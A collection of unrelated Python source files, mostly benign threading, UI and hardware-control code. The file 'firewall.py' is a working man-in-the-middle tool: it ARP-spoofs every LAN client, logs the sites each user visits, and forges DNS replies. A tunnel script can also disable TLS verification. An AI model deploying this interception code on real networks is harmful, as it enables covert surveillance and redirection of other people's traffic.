tunnel.py
|
"""
tunnel.py will tunnel a TCP connection to the service (typically a shell) with ID equal to
SERVICE_UUID over a WebSocket connection to a Determined master at MASTER_ADDR.
"""
import argparse
import io
import os
import socket
import ssl
import sys
import threading
from typing import Optional
import lomond
from determined_common.api import request
class CustomSSLWebsocketSession(lomond.session.WebsocketSession): # type: ignore
"""
A session class that allows for the TLS verification mode of a WebSocket connection to be
configured.
"""
def __init__(
self, socket: lomond.WebSocket, cert_file: Optional[str], cert_name: Optional[str]
) -> None:
super().__init__(socket)
self.ctx = ssl.create_default_context()
if cert_file == "False":
self.ctx.verify_mode = ssl.CERT_NONE
return
if cert_file is not None:
self.ctx.load_verify_locations(cafile=cert_file)
self.cert_name = cert_name
def _wrap_socket(self, sock: socket.SocketType, host: str) -> socket.SocketType:
return self.ctx.wrap_socket(sock, server_hostname=self.cert_name or host)
def copy_to_websocket(
ws: lomond.WebSocket, f: io.RawIOBase, ready_sem: threading.Semaphore
) -> None:
ready_sem.acquire()
try:
while True:
chunk = f.read(4096)
if not chunk:
break
ws.send_binary(chunk)
finally:
f.close()
ws.close()
def copy_from_websocket(
f: io.RawIOBase,
ws: lomond.WebSocket,
ready_sem: threading.Semaphore,
cert_file: Optional[str],
cert_name: Optional[str],
) -> None:
try:
for event in ws.connect(
ping_rate=0,
session_class=lambda socket: CustomSSLWebsocketSession(socket, cert_file, cert_name),
):
if isinstance(event, lomond.events.Binary):
f.write(event.data)
elif isinstance(event, lomond.events.Ready):
ready_sem.release()
elif isinstance(
event,
(lomond.events.ConnectFail, lomond.events.Rejected, lomond.events.ProtocolError),
):
raise Exception("Connection failed: {}".format(event))
elif isinstance(event, (lomond.events.Closing, lomond.events.Disconnected)):
break
finally:
f.close()
def http_connect_tunnel(
master: str, service: str, cert_file: Optional[str], cert_name: Optional[str]
) -> None:
parsed_master = request.parse_master_address(master)
assert parsed_master.hostname is not None, "Failed to parse master address: {}".format(master)
url = request.make_url(master, "proxy/{}/".format(service))
ws = lomond.WebSocket(request.maybe_upgrade_ws_scheme(url))
# We can't send data to the WebSocket before the connection becomes ready, which takes a bit of
# time; this semaphore lets the sending thread wait for that to happen.
ready_sem = threading.Semaphore(0)
# Directly using sys.stdin.buffer.read or sys.stdout.buffer.write would block due to
# buffering; instead, we use unbuffered file objects based on the same file descriptors.
unbuffered_stdin = os.fdopen(sys.stdin.fileno(), "rb", buffering=0)
unbuffered_stdout = os.fdopen(sys.stdout.fileno(), "wb", buffering=0)
c1 = threading.Thread(target=copy_to_websocket, args=(ws, unbuffered_stdin, ready_sem))
c2 = threading.Thread(
target=copy_from_websocket, args=(unbuffered_stdout, ws, ready_sem, cert_file, cert_name)
)
c1.start()
c2.start()
c1.join()
c2.join()
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Tunnel through a Determined master")
parser.add_argument("master_addr")
parser.add_argument("service_uuid")
parser.add_argument("--cert-file")
parser.add_argument("--cert-name")
args = parser.parse_args()
http_connect_tunnel(args.master_addr, args.service_uuid, args.cert_file, args.cert_name)
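# Illustrative invocation (the master address, service UUID and certificate paths are placeholders,
# not values taken from this repository):
#   python tunnel.py https://determined-master.example.com:8443 <service-uuid> \
#       --cert-file /path/to/master-ca.pem --cert-name determined-master
# stdin/stdout of this process are then relayed over the master's WebSocket proxy endpoint.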
|
test_threaded.py
|
import os
import sys
import signal
import threading
from multiprocessing.pool import ThreadPool
from time import time, sleep
import pytest
import dask
from dask.compatibility import PY2
from dask.threaded import get
from dask.utils_test import inc, add
def test_get():
dsk = {'x': 1, 'y': 2, 'z': (inc, 'x'), 'w': (add, 'z', 'y')}
assert get(dsk, 'w') == 4
assert get(dsk, ['w', 'z']) == (4, 2)
def test_nested_get():
dsk = {'x': 1, 'y': 2, 'a': (add, 'x', 'y'), 'b': (sum, ['x', 'y'])}
assert get(dsk, ['a', 'b']) == (3, 3)
def test_get_without_computation():
dsk = {'x': 1}
assert get(dsk, 'x') == 1
def test_broken_callback():
from dask.callbacks import Callback
def _f_ok(*args, **kwargs):
pass
def _f_broken(*args, **kwargs):
raise ValueError('my_exception')
dsk = {'x': 1}
with Callback(start=_f_broken, finish=_f_ok):
with Callback(start=_f_ok, finish=_f_ok):
with pytest.raises(ValueError, match='my_exception'):
get(dsk, 'x')
def bad(x):
raise ValueError()
def test_exceptions_rise_to_top():
dsk = {'x': 1, 'y': (bad, 'x')}
pytest.raises(ValueError, lambda: get(dsk, 'y'))
def test_reuse_pool():
pool = ThreadPool()
with dask.config.set(pool=pool):
assert get({'x': (inc, 1)}, 'x') == 2
assert get({'x': (inc, 1)}, 'x') == 2
@pytest.mark.skipif(PY2, reason="threading API changed")
def test_pool_kwarg():
def f():
sleep(0.01)
return threading.get_ident()
dsk = {('x', i): (f,) for i in range(30)}
dsk['x'] = (len, (set, [('x', i) for i in range(len(dsk))]))
with ThreadPool(3) as pool:
assert get(dsk, 'x', pool=pool) == 3
def test_threaded_within_thread():
L = []
def f(i):
result = get({'x': (lambda: i,)}, 'x', num_workers=2)
L.append(result)
before = threading.active_count()
for i in range(20):
t = threading.Thread(target=f, args=(1,))
t.daemon = True
t.start()
t.join()
assert L == [1]
del L[:]
start = time() # wait for most threads to join
while threading.active_count() > before + 10:
sleep(0.01)
assert time() < start + 5
def test_dont_spawn_too_many_threads():
before = threading.active_count()
dsk = {('x', i): (lambda: i,) for i in range(10)}
dsk['x'] = (sum, list(dsk))
for i in range(20):
get(dsk, 'x', num_workers=4)
after = threading.active_count()
assert after <= before + 8
def test_thread_safety():
def f(x):
return 1
dsk = {'x': (sleep, 0.05), 'y': (f, 'x')}
L = []
def test_f():
L.append(get(dsk, 'y'))
threads = []
for i in range(20):
t = threading.Thread(target=test_f)
t.daemon = True
t.start()
threads.append(t)
for thread in threads:
thread.join()
assert L == [1] * 20
@pytest.mark.xfail('xdist' in sys.modules,
reason=("This test fails intermittently when using "
"pytest-xdist (maybe)"))
def test_interrupt():
# Python 2 and windows 2 & 3 both implement `queue.get` using polling,
# which means we can set an exception to interrupt the call to `get`.
# Python 3 on other platforms requires sending SIGINT to the main thread.
if PY2:
from thread import interrupt_main
elif os.name == 'nt':
from _thread import interrupt_main
else:
main_thread = threading.get_ident()
def interrupt_main():
signal.pthread_kill(main_thread, signal.SIGINT)
def long_task():
sleep(5)
dsk = {('x', i): (long_task,) for i in range(20)}
dsk['x'] = (len, list(dsk.keys()))
try:
interrupter = threading.Timer(0.5, interrupt_main)
interrupter.start()
start = time()
get(dsk, 'x')
except KeyboardInterrupt:
pass
except Exception:
assert False, "Failed to interrupt"
stop = time()
if stop - start > 4:
assert False, "Failed to interrupt"
|
base.py
|
"""
Progress bar implementation on top of prompt_toolkit.
::
with ProgressBar(...) as pb:
for item in pb(data):
...
"""
import datetime
import functools
import os
import signal
import threading
import traceback
from asyncio import get_event_loop, new_event_loop, set_event_loop
from typing import (
Generic,
Iterable,
List,
Optional,
Sequence,
Sized,
TextIO,
TypeVar,
cast,
)
from prompt_toolkit.application import Application
from prompt_toolkit.application.current import get_app_session
from prompt_toolkit.filters import Condition, is_done, renderer_height_is_known
from prompt_toolkit.formatted_text import (
AnyFormattedText,
StyleAndTextTuples,
to_formatted_text,
)
from prompt_toolkit.input import Input
from prompt_toolkit.key_binding import KeyBindings
from prompt_toolkit.key_binding.key_processor import KeyPressEvent
from prompt_toolkit.layout import (
ConditionalContainer,
FormattedTextControl,
HSplit,
Layout,
VSplit,
Window,
)
from prompt_toolkit.layout.controls import UIContent, UIControl
from prompt_toolkit.layout.dimension import AnyDimension, D
from prompt_toolkit.output import ColorDepth, Output
from prompt_toolkit.styles import BaseStyle
from prompt_toolkit.utils import in_main_thread
from .formatters import Formatter, create_default_formatters
try:
import contextvars
except ImportError:
from prompt_toolkit.eventloop import dummy_contextvars as contextvars # type: ignore
__all__ = [
"ProgressBar",
]
E = KeyPressEvent
def create_key_bindings() -> KeyBindings:
"""
Key bindings handled by the progress bar.
(The main thread is not supposed to handle any key bindings.)
"""
kb = KeyBindings()
@kb.add("c-l")
def _(event: E) -> None:
event.app.renderer.clear()
@kb.add("c-c")
def _(event: E) -> None:
# Send KeyboardInterrupt to the main thread.
os.kill(os.getpid(), signal.SIGINT)
return kb
_T = TypeVar("_T")
class ProgressBar:
"""
Progress bar context manager.
Usage ::
with ProgressBar(...) as pb:
for item in pb(data):
...
:param title: Text to be displayed above the progress bars. This can be a
callable or formatted text as well.
:param formatters: List of :class:`.Formatter` instances.
:param bottom_toolbar: Text to be displayed in the bottom toolbar. This
can be a callable or formatted text.
:param style: :class:`prompt_toolkit.styles.BaseStyle` instance.
:param key_bindings: :class:`.KeyBindings` instance.
:param file: The file object used for rendering, by default `sys.stderr` is used.
:param color_depth: `prompt_toolkit` `ColorDepth` instance.
:param output: :class:`~prompt_toolkit.output.Output` instance.
:param input: :class:`~prompt_toolkit.input.Input` instance.
"""
def __init__(
self,
title: AnyFormattedText = None,
formatters: Optional[Sequence[Formatter]] = None,
bottom_toolbar: AnyFormattedText = None,
style: Optional[BaseStyle] = None,
key_bindings: Optional[KeyBindings] = None,
file: Optional[TextIO] = None,
color_depth: Optional[ColorDepth] = None,
output: Optional[Output] = None,
input: Optional[Input] = None,
) -> None:
self.title = title
self.formatters = formatters or create_default_formatters()
self.bottom_toolbar = bottom_toolbar
self.counters: List[ProgressBarCounter[object]] = []
self.style = style
self.key_bindings = key_bindings
# Note that we use __stderr__ as default error output, because that
# works best with `patch_stdout`.
self.color_depth = color_depth
self.output = output or get_app_session().output
self.input = input or get_app_session().input
self._thread: Optional[threading.Thread] = None
self._loop = get_event_loop()
self._app_loop = new_event_loop()
self._previous_winch_handler = (
signal.getsignal(signal.SIGWINCH) if hasattr(signal, "SIGWINCH") else None
)
self._has_sigwinch = False
def __enter__(self) -> "ProgressBar":
# Create UI Application.
title_toolbar = ConditionalContainer(
Window(
FormattedTextControl(lambda: self.title),
height=1,
style="class:progressbar,title",
),
filter=Condition(lambda: self.title is not None),
)
bottom_toolbar = ConditionalContainer(
Window(
FormattedTextControl(
lambda: self.bottom_toolbar, style="class:bottom-toolbar.text"
),
style="class:bottom-toolbar",
height=1,
),
filter=~is_done
& renderer_height_is_known
& Condition(lambda: self.bottom_toolbar is not None),
)
def width_for_formatter(formatter: Formatter) -> AnyDimension:
# Needs to be passed as callable (partial) to the 'width'
# parameter, because we want to call it on every resize.
return formatter.get_width(progress_bar=self)
progress_controls = [
Window(
content=_ProgressControl(self, f),
width=functools.partial(width_for_formatter, f),
)
for f in self.formatters
]
self.app: Application[None] = Application(
min_redraw_interval=0.05,
layout=Layout(
HSplit(
[
title_toolbar,
VSplit(
progress_controls,
height=lambda: D(
preferred=len(self.counters), max=len(self.counters)
),
),
Window(),
bottom_toolbar,
]
)
),
style=self.style,
key_bindings=self.key_bindings,
refresh_interval=0.3,
color_depth=self.color_depth,
output=self.output,
input=self.input,
)
# Run application in different thread.
def run() -> None:
set_event_loop(self._app_loop)
try:
self.app.run()
except BaseException as e:
traceback.print_exc()
print(e)
ctx: contextvars.Context = contextvars.copy_context()
self._thread = threading.Thread(target=ctx.run, args=(run,))
self._thread.start()
# Attach WINCH signal handler in main thread.
# (Interrupt that we receive during resize events.)
self._has_sigwinch = hasattr(signal, "SIGWINCH") and in_main_thread()
if self._has_sigwinch:
self._previous_winch_handler = signal.getsignal(signal.SIGWINCH)
self._loop.add_signal_handler(signal.SIGWINCH, self.invalidate)
return self
def __exit__(self, *a: object) -> None:
# Quit UI application.
if self.app.is_running:
self.app.exit()
# Remove WINCH handler.
if self._has_sigwinch:
self._loop.remove_signal_handler(signal.SIGWINCH)
signal.signal(signal.SIGWINCH, self._previous_winch_handler)
if self._thread is not None:
self._thread.join()
self._app_loop.close()
def __call__(
self,
data: Optional[Iterable[_T]] = None,
label: AnyFormattedText = "",
remove_when_done: bool = False,
total: Optional[int] = None,
) -> "ProgressBarCounter[_T]":
"""
Start a new counter.
:param label: Title text or description for this progress. (This can be
formatted text as well).
:param remove_when_done: When `True`, hide this progress bar.
:param total: Specify the maximum value if it can't be calculated by
calling ``len``.
"""
counter = ProgressBarCounter(
self, data, label=label, remove_when_done=remove_when_done, total=total
)
self.counters.append(counter)
return counter
def invalidate(self) -> None:
self._app_loop.call_soon_threadsafe(self.app.invalidate)
class _ProgressControl(UIControl):
"""
User control for the progress bar.
"""
def __init__(self, progress_bar: ProgressBar, formatter: Formatter) -> None:
self.progress_bar = progress_bar
self.formatter = formatter
self._key_bindings = create_key_bindings()
def create_content(self, width: int, height: int) -> UIContent:
items: List[StyleAndTextTuples] = []
for pr in self.progress_bar.counters:
try:
text = self.formatter.format(self.progress_bar, pr, width)
except BaseException:
traceback.print_exc()
text = "ERROR"
items.append(to_formatted_text(text))
def get_line(i: int) -> StyleAndTextTuples:
return items[i]
return UIContent(get_line=get_line, line_count=len(items), show_cursor=False)
def is_focusable(self) -> bool:
return True # Make sure that the key bindings work.
def get_key_bindings(self) -> KeyBindings:
return self._key_bindings
_CounterItem = TypeVar("_CounterItem", covariant=True)
class ProgressBarCounter(Generic[_CounterItem]):
"""
An individual counter (A progress bar can have multiple counters).
"""
def __init__(
self,
progress_bar: ProgressBar,
data: Optional[Iterable[_CounterItem]] = None,
label: AnyFormattedText = "",
remove_when_done: bool = False,
total: Optional[int] = None,
) -> None:
self.start_time = datetime.datetime.now()
self.stop_time: Optional[datetime.datetime] = None
self.progress_bar = progress_bar
self.data = data
self.items_completed = 0
self.label = label
self.remove_when_done = remove_when_done
self._done = False
self.total: Optional[int]
if total is None:
try:
self.total = len(cast(Sized, data))
except TypeError:
self.total = None # We don't know the total length.
else:
self.total = total
def __iter__(self) -> Iterable[_CounterItem]:
try:
if self.data is not None:
for item in self.data:
yield item
self.item_completed()
finally:
self.done = True
def item_completed(self) -> None:
"""
Start handling the next item.
(Can be called manually in case we don't have a collection to loop through.)
"""
self.items_completed += 1
self.progress_bar.invalidate()
@property
def done(self) -> bool:
return self._done
@done.setter
def done(self, value: bool) -> None:
self._done = value
# If done then store the stop_time, otherwise clear.
self.stop_time = datetime.datetime.now() if value else None
if value and self.remove_when_done:
self.progress_bar.counters.remove(self)
@property
def percentage(self) -> float:
if self.total is None:
return 0
else:
return self.items_completed * 100 / max(self.total, 1)
@property
def time_elapsed(self) -> datetime.timedelta:
"""
Return how much time has been elapsed since the start.
"""
if self.stop_time is None:
return datetime.datetime.now() - self.start_time
else:
return self.stop_time - self.start_time
@property
def time_left(self) -> Optional[datetime.timedelta]:
"""
Timedelta representing the time left.
"""
if self.total is None or not self.percentage:
return None
else:
return self.time_elapsed * (100 - self.percentage) / self.percentage
|
server.py
|
import time
import board
import neopixel
import threading
from flask import Flask
# Choose an open pin connected to the Data In of the NeoPixel strip, i.e. board.D18
# NeoPixels must be connected to D10, D12, D18 or D21 to work.
pixel_pin = board.D21
# The number of NeoPixels
num_pixels = 137
# The order of the pixel colors - RGB or GRB. Some NeoPixels have red and green reversed!
# For RGBW NeoPixels, simply change the ORDER to RGBW or GRBW.
ORDER = neopixel.GRB
pixels = neopixel.NeoPixel(pixel_pin, num_pixels, brightness=1.0, auto_write=False,
pixel_order=ORDER)
app = Flask(__name__)
rgb=(255,255,255)
status = 0
enableRainbow = False
# I'm not entirely sure what to do with the ratio yet. Repeated brightness adjustments cause problems. Maybe max this until >=1 of the component values is 255?
rgbRatio=(255, 255, 255)
brightness = 1
def wheel(pos):
# Input a value 0 to 255 to get a color value.
# The colours are a transition r - g - b - back to r.
global brightness
if pos < 0 or pos > 255:
r = g = b = 0
elif pos < 85:
r = int(pos * 3)
g = int(255 - pos*3)
b = 0
elif pos < 170:
pos -= 85
r = int(255 - pos*3)
g = 0
b = int(pos*3)
else:
pos -= 170
r = 0
g = int(pos*3)
b = int(255 - pos*3)
r, g, b = int(brightness * r), int(brightness * g), int(brightness * b)
return (r, g, b) if ORDER == neopixel.RGB or ORDER == neopixel.GRB else (r, g, b, 0)
def rgb_to_hex(rgb):
return '#%02x%02x%02x' % rgb
def hex_to_rgb(value):
"""Return (red, green, blue) for the color given as #rrggbb."""
value = value.lstrip('#')
lv = len(value)
return tuple(int(value[i:i + lv // 3], 16) for i in range(0, lv, lv // 3))
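# Quick sanity examples for the two helpers above (values verified by hand, not taken from the project):
#   rgb_to_hex((255, 136, 0))  -> '#ff8800'
#   hex_to_rgb('#ff8800')      -> (255, 136, 0)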
def rainbow_cycle():
global enableRainbow
while enableRainbow:
for j in range(255):
# This is necessary because with longer strands this nested loop just takes foreverrrrrr, so breaking will force a re-eval. It's hacky, and could
# be done more cleanly probably. Consider refactoring in the future to move the thread object to be global, making it stoppable and then implementing
# more consistent checks instead of having random globals flying all over the place. Blame the wine.
if not enableRainbow:
break
for i in range(num_pixels):
pixel_index = (i * 256 // num_pixels) + j
pixels[i] = wheel(pixel_index & 255)
pixels.show()
off()
return
@app.route("/status")
def status():
global status
return str(status)
@app.route("/bright")
def bright():
global rgb
print(str(int(brightness*100)))
return str(int(brightness*100))
@app.route("/color")
def color():
global rgb
value = rgb_to_hex(rgb)
return str(value)
@app.route("/rainbow")
def rainbow():
global enableRainbow
global status
status = 1
global rgb
pixels.fill(rgb)
pixels.show()
    if not enableRainbow:
        enableRainbow = True
t = threading.Thread(target = rainbow_cycle)
t.start()
return "on"
# TODO: Test this actually works. Can this be condensed in to the other /bright route? Is it easier to just have one with no args and one with args?
# TODO: Handle case where brightness is 0.
# More Info on setBrightness() call: https://forums.adafruit.com/viewtopic.php?t=41143
@app.route("/setbright/<value>")
def setbright(value):
global rgb
global brightness
brightness = int(value) / 100
rgb = tuple(int(brightness * v) for v in rgbRatio)
return str(int(brightness*100))
@app.route("/on")
def on():
global status
status = 1
global rgb
pixels.fill(rgb)
pixels.show()
return "on"
@app.route("/off")
def off():
global status
status = 0
global enableRainbow
enableRainbow=False
pixels.fill((0,0,0))
pixels.show()
return "off"
@app.route("/set/<values>")
def set(values):
global enableRainbow
enableRainbow=False
h = values
#h = values.replace("NA","0").replace("N","1")
global rgb
global rgbRatio
#rgb=hex_to_rgb(h)
    rgb = tuple(int(h[i:i + 2], 16) for i in (0, 2, 4))
    # Figure out which of these is the highest value, and how far it needs to scale to get to 255.
    # Guard against division by zero when the requested colour is pure black (000000).
    rgbRatio = tuple(int(v * 255 / max(max(rgb), 1)) for v in rgb)
pixels.fill(rgb)
pixels.show()
return "ok"
|
pygments_style.py
|
"""Display a "Syntax Colors" menu."""
from __future__ import annotations
import threading
import tkinter
from pygments import styles, token
from porcupine import get_main_window, get_tab_manager, menubar, settings, utils
def get_colors(style_name: str) -> tuple[str, str]:
style = styles.get_style_by_name(style_name)
bg = style.background_color
# style_names have a style_for_token() method, but only iterating
# is documented :( http://pygments.org/docs/formatterdevelopment/
# i'm using iter() to make sure that dict() really treats
# the style as an iterable of pairs instead of some other
# metaprogramming fanciness
style_infos = dict(iter(style))
fg = style_infos[token.String]["color"] or style_infos[token.Text]["color"]
if fg:
# style_infos doesn't contain leading '#' for whatever reason
fg = "#" + fg
else:
# do like textutils.use_pygments_theme does
fg = getattr(style, "default_style", "") or utils.invert_color(bg)
return (fg, bg)
# threading this gives a significant speed improvement on startup
# on this system, setup() took 0.287940 seconds before adding threads
# and 0.000371 seconds after adding threads
def load_style_names_to_list(target_list: list[str]) -> None:
target_list.extend(styles.get_all_styles()) # slow
target_list.sort()
def setup() -> None:
style_names: list[str] = []
thread = threading.Thread(target=load_style_names_to_list, args=[style_names])
thread.daemon = True # i don't care wtf happens to this
thread.start()
def check_if_it_finished() -> None:
if thread.is_alive():
get_main_window().after(200, check_if_it_finished)
return
var = tkinter.StringVar(value=settings.get("pygments_style", str))
def settings2var(event: tkinter.Event[tkinter.Misc]) -> None:
var.set(settings.get("pygments_style", str))
def var2settings(*junk: str) -> None:
settings.set_("pygments_style", var.get())
# this doesn't recurse infinitely because <<SettingChanged:bla>>
# gets generated only when the setting actually changes
get_tab_manager().bind("<<SettingChanged:pygments_style>>", settings2var, add=True)
var.trace_add("write", var2settings)
for style_name in style_names:
fg, bg = get_colors(style_name)
menubar.get_menu("Syntax Colors").add_radiobutton(
label=style_name,
value=style_name,
variable=var,
foreground=fg,
background=bg,
# swapped colors
activeforeground=bg,
activebackground=fg,
)
get_main_window().after(200, check_if_it_finished)
|
module2.py
|
#-------------------------------------------------------------------------------
# Name: module1
# Purpose:
#
# Author: Rajesh
#
# Created: 24-12-2019
# Copyright: (c) Rajesh 2019
# Licence: <your licence>
#-------------------------------------------------------------------------------
import os
import threading
import time
def fun():
time.sleep(3)
print("fin")
def func():
print ("hi")
mine = fun()
return
def main():
    my = threading.Thread(target = func)
    my.start()  # the thread was previously created but never started, so func() never ran
    time.sleep(10)
    my.join()
    return
if __name__ == '__main__':
main()
|
deyaml.py
|
"""The Walking Thread"""
import logging
import os
import threading, queue
from pathlib import Path
import yaml
import string
log = logging.getLogger(__name__)  # "log" is used in worker() below but was never defined
kolejka_folder = queue.Queue()
CODE_PATH = "/home/kris/workshops/tools/copypaster/dirtynotes/folders/maps"
DECKS = "decks"
YAML_FILES = (
'.yaml',
'.yml',
)
CLICK_COUNT = "click_count"
INFO = "info"
NAME = "name"
VALUE = "value"
BUTTONS = "buttons"
CATEGORY = "category"
SNIPPET = "snippet"
CONTENT = "content"
INFO = "info"
MAX_FILENAME_LENGTH = 18
join = os.path.join
rules = str.maketrans('', '', string.punctuation)
name_counter = 1
_name_lock = threading.Lock()  # module-level lock: a lock created per call would never synchronize callers
def placeholder_name():
    with _name_lock:
        global name_counter
        name = f"snippet_{name_counter}"
        name_counter += 1
        return name
def clean_name(name):
    name = name.strip()
name = name.translate(rules)
if len(name) > MAX_FILENAME_LENGTH:
name = name[:MAX_FILENAME_LENGTH]
if len(name) == 0:
name = placeholder_name()
return name
def read(entry):
if entry.is_file():
return ('file', f"name: {entry.name}", f"path: {entry.path}")
if entry.is_dir():
return ('dir', f"name: {entry.name}", f"path: {entry.path}")
class Snippet:
def __init__(self):
self.name = ""
self.content = ""
@property
def file_name(self):
return self.name.replace(" ", "-")
def populate(self, button):
self.content = str(button.get(VALUE, ""))
self.name = str(button.get(NAME, button.get(VALUE, "")))
self.name = clean_name(self.name)
return self
def load(self, path):
with open(path, 'r') as f:
content = f.readlines()
# f"# name: {self.name}\n"
self.name = content[0][8:].strip()
self.content = "".join(content[1:])
return self
def save(self, path):
with open(join(path, self.file_name), 'w') as f:
f.write(f"# name: {self.name} \n")
f.write(self.content)
return self
class YamlFile:
def __init__(self, file_path):
self.contents = None
self.load(file_path)
def load(self, path):
"""Load file"""
with open(path) as f:
self.contents = yaml.load(f.read(), Loader=yaml.FullLoader)
def transform_into_snippets(self):
for button in self.contents[BUTTONS]:
yield Snippet().populate(button)
def extract_values(entry):
path = Path(entry.path)
yaml_snippets = YamlFile(entry.path)
snippet_folder = path.with_suffix('')
snippet_folder.mkdir(parents=True, exist_ok=True)
snippet_folder = str(snippet_folder)
[snippet.save(snippet_folder) for snippet in yaml_snippets.transform_into_snippets()]
def deyaml(folder):
    # TODO: here I can read a file with metadata
with os.scandir(folder) as it:
for entry in it:
if entry.name.startswith('.'):
continue
if entry.is_dir():
kolejka_folder.put(entry.path)
if Path(entry.path).suffix not in YAML_FILES:
continue
extract_values(entry)
def worker():
while True:
folder = kolejka_folder.get()
log.info(f'Working on folder: {folder}')
deyaml(folder)
print(f'Finished {folder}')
kolejka_folder.task_done()
if __name__ == "__main__":
    logging.basicConfig(level=logging.INFO)
    # turn-on the worker thread
threading.Thread(target=worker, daemon=True).start()
kolejka_folder.put(CODE_PATH)
# block until all tasks are done
kolejka_folder.join()
print('All work completed')
|
firewall.py
|
#!/usr/bin/env python3
import netfilterqueue
import scapy.all as scapy
from scapy.layers import http
import argparse
import os  # needed for os.path.abspath / os.getcwd below
import re
from threading import *
from time import *
connected_clients = []
blocked_websites = []
file_name = re.sub(r"\s\d\d:\d\d:\d\d", "", asctime())
log_file = open(os.path.abspath(os.getcwd())+"/Logs/"+file_name+".txt", "a")
def get_arguments():
parser = argparse.ArgumentParser()
parser.add_argument("-t", "--target", dest="target", help="Use to specify target IP/IP Range.")
parser.add_argument("-g", "--gateway", dest="gateway_ip", help="Use to specify the gateway IP.")
options = parser.parse_args()
if not options.target:
parser.error("[-] Please specify a target IP/IP Range, use --help for more info.")
if not options.gateway_ip:
parser.error("[-] Please specify the gateway IP, use --help for more info.")
return options
def scan(ip):
global connected_clients
while True:
arp_request = scapy.ARP(pdst=ip)
broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
arp_request_broadcast = broadcast/arp_request
answered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0]
clients_list = []
for element in answered_list:
client_dict = {"ip":element[1].psrc , "mac":element[1].hwsrc}
clients_list.append(client_dict)
connected_clients = [] + clients_list
print_scan_result(connected_clients)
print("\rNumber of Connected Clients: ", len(connected_clients))
sleep(120)
def print_scan_result(results_list):
print("IP\t\t\tMAC Address\n-----------------------------------------")
for client in results_list:
print(client["ip"]+"\t\t"+client["mac"])
def get_mac(ip):
arp_request = scapy.ARP(pdst=ip)
broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
arp_request_broadcast = broadcast/arp_request
answered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0]
return answered_list[0][1].hwsrc
def connect_clients(gateway_ip):
global connected_clients
gateway_mac = get_mac(gateway_ip)
try:
while True:
for client in connected_clients:
packet_1 = scapy.ARP(op=2, pdst=client["ip"], hwdst=client["mac"], psrc=gateway_ip)
packet_2 = scapy.ARP(op=2, pdst=gateway_ip, hwdst=gateway_mac, psrc=client["ip"])
scapy.send(packet_1,verbose=False)
scapy.send(packet_2,verbose=False)
sleep(2)
except:
print("[!] Restoring ARP Tables......")
for client in connected_clients:
packet_1 = scapy.ARP(op=2, pdst=client["ip"], hwdst=client["mac"], psrc=gateway_ip, hwsrc=gateway_mac)
packet_2 = scapy.ARP(op=2, pdst=gateway_ip, hwdst=gateway_mac, psrc=client["ip"], hwsrc=client["mac"])
scapy.send(packet_1, count=4, verbose=False)
scapy.send(packet_2, count=4, verbose=False)
def read_blocked_websites():
global blocked_websites
blocked_website_list_file = open("website_list.txt", "r")
for each_website in blocked_website_list_file:
blocked_websites.append(each_website.strip("\n"))
def write_log(url):
log_file.write(asctime()+"\t"+url+"\n\n")
def process_packet(packet):
scapy_packet = scapy.IP(packet.get_payload())
if scapy_packet.haslayer(http.HTTPRequest):
if scapy_packet[scapy.TCP].dport == 80:
url = "User at ip "+str(scapy_packet[scapy.IP].src) + " Accessed: "+str(scapy_packet[http.HTTPRequest].Host) #+ str(scapy_packet[http.HTTPRequest].Path)
#print(url)
write_log(url)
if scapy_packet.haslayer(scapy.DNSRR):
website_requested = scapy_packet[scapy.DNSQR].qname.decode()
for name in blocked_websites:
if name in website_requested:
print("[+] Blocking Website:",website_requested)
answer = scapy.DNSRR(rrname=website_requested, rdata="10.0.2.14")
scapy_packet[scapy.DNS].an = answer
scapy_packet[scapy.DNS].ancount = 1
del scapy_packet[scapy.IP].len
del scapy_packet[scapy.IP].chksum
del scapy_packet[scapy.UDP].chksum
del scapy_packet[scapy.UDP].len
packet.set_payload(bytes(scapy_packet))
packet.accept()
def filter_traffic():
print("[+] Reading blocked website list")
try:
read_blocked_websites()
except:
print("[-] Error Occurred, Unable to read file")
else:
print("[+] Website list successfully read")
print(blocked_websites)
while True:
queue = netfilterqueue.NetfilterQueue()
queue.bind(0, process_packet)
queue.run()
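# (Added note) netfilterqueue only receives packets the kernel has been told to
# hand to queue 0; a typical (assumed) rule on the forwarding host would be:
#   iptables -I FORWARD -j NFQUEUE --queue-num 0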
try:
options = get_arguments()
scan_network = Thread(target=scan, args=(options.target,), daemon=True)
route_clients = Thread(target=connect_clients, args=(options.gateway_ip,), daemon=True)
network_filter = Thread(target=filter_traffic, daemon=True)
scan_network.start()
route_clients.start()
network_filter.start()
scan_network.join()
route_clients.join()
network_filter.join()
except KeyboardInterrupt:
gateway_mac = get_mac(options.gateway_ip)
print("[!] Restoring ARP Tables......")
for client in connected_clients:
packet_1 = scapy.ARP(op=2, pdst=client["ip"], hwdst=client["mac"], psrc=options.gateway_ip, hwsrc=gateway_mac)
packet_2 = scapy.ARP(op=2, pdst=options.gateway_ip, hwdst=gateway_mac, psrc=client["ip"], hwsrc=client["mac"])
scapy.send(packet_1, count=4, verbose=False)
scapy.send(packet_2, count=4, verbose=False)
print("[+] ARP Tables Restored")
print("[+] Writing Logs to the Memory...........")
log_file.close()
print("[+] Logs Successfully written.......Quitting....")
|
algo_one.py
|
from functools import reduce
from sys import exit
import numpy as np
import random as r
import socket
import struct
import subprocess as sp
import threading
from threading import Thread
import ast
import time
import datetime as dt
import os
import psutil
from netifaces import interfaces, ifaddresses, AF_INET
import paho.mqtt.client as mqtt
import smtplib
import config
import paramiko
# update required not done
hosts = {} # {hostname: ip}
_tasks = {'t1': {'wcet': 3, 'period': 20, 'deadline': 15},
't2': {'wcet': 1, 'period': 5, 'deadline': 4},
't3': {'wcet': 2, 'period': 10, 'deadline': 8},
't4': {'wcet': 1, 'period': 10, 'deadline': 9},
't5': {'wcet': 3, 'period': 15, 'deadline': 12}
}
# mat = {'p0': ['cpu', 'mem', 'storage']}
_need = {
't1': [7, 4, 3],
't2': [1, 2, 2],
't3': [6, 0, 0],
't4': [0, 1, 1],
't5': [4, 3, 1]
}
allocation = {
't1': [0, 1, 0],
't2': [2, 0, 0],
't3': [3, 0, 2],
't4': [2, 1, 1],
't5': [0, 0, 2]
}
_cpu = [] # cpu plot list
prev_t = 0 # variable for cpu util
_off_mec = 0 # used to keep a count of tasks offloaded from local mec to another mec
_off_cloud = 0 # used to keep a count of tasks offloaded to cloud
